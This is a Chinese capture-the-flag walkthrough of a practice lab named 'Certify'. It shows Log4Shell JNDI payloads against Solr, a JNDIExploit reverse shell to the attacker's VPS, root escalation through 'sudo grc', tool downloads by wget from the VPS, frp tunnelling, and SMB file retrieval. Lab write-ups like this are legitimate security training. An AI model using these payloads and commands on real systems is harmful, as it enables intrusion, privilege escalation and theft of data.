春秋云镜靶场2

春秋云镜 Certify

一、flag01

先用fscan扫描一下

扫出来了一个 Solr 服务

Solr 是开源的，基于 Lucene Java 的搜索服务器。
易于加入到 Web 应用程序中，会生成基于HTTP 的管理界面。
后台管理界面Dashboard仪表盘中，可查看当前Solr的版本信息。

访问这个地址，发现是 solr8.11.0 版本，搭载了 lo4j2 组件，solr8.11.0 刚好也是能触发 log4j2 漏洞的最新版本

用 dnslog 探测一下是否存在 log4j2 漏洞

http://121.89.212.114:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.hsd11b.dnslog.cn} 
#hsd11b.dnslog.cn是DNSLog Get SubDomain的url

dnslog回显

在 vps 上开启 1389 和 3456 端口，然后跑一下 JNDIExploit（如果跑不起来，多半是 java 版本的问题，换成 1.8 就好了）

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPS_IP

然后访问

http://靶场地址:8983/solr/admin/cores?action=${jndi:ldap://VPS_IP:1389/Basic/ReverseShell/VPS_IP/22222}

同时在VPS上开启监听

成功反弹Shell

这里拿下的权限不是 root，肯定是要提权的，先看看 suid 权限有没有可用的

先用sudo -l，一般来说 sudo -l 能用，基本就能靠里面的东西提权

sudo -l

grc 就是一个显示高亮的命令，后面跟着要执行的原始命令，这里任何用户都可以以 root 权限运行 grc，那就等于给了我们 root 权限

sudo grc --help

sudo grc --pty whoami

这里可以看到我们可以用grc来获得root的权限

然后我们查找一下flag

sudo grc --pty find / -name flag*

发现flag01.txt，输出一下

sudo grc --pty cat /root/flag/flag01.txt

二、flag02

信息收集

ifconfig

先在VPS上架设http服务，wget下载frpc和fscan

python3 -m http.server 8001

这里wget下载时注意也要用grc提权

sudo grc --pty wget http://113.45.36.119:8001/frpc.ini
sudo grc --pty wget http://113.45.36.119:8001/frpc
sudo grc --pty wget http://113.45.36.119:8001/fscan

接着用fscan扫描内网

172.22.9.7 DC 
172.22.9.26 域内机器
172.22.9.19 已拿下
172.22.9.47 fileserver

内网穿透

先在VPS上启动服务端服务

./frps -c frps.ini

frps.ini配置

然后运行客户端

./frpc -c frpc.ini

frpc.ini配置

成功穿透后配置proxychains4.conf

vim /etc/proxychains4.conf

使用 smbclient 连接共享

proxychains smbclient \\\\172.22.9.47\\fileshare

ls查看一下，在secret下发现flag02.txt

在smbclient下是不能直接看的，要用get下载下来

get flag02.txt

需要注意在哪一个目录下运行smbclient，smb就会把下载的文件放到该目录下

这里还提示我们 SPN，之后应该会用到

三、flag03

回到上一层文件夹下载目录下的 personnel.db

下载下来之后发现有两张表的内容是有用的，其中一张表里面有密码

另一张表里面是用户名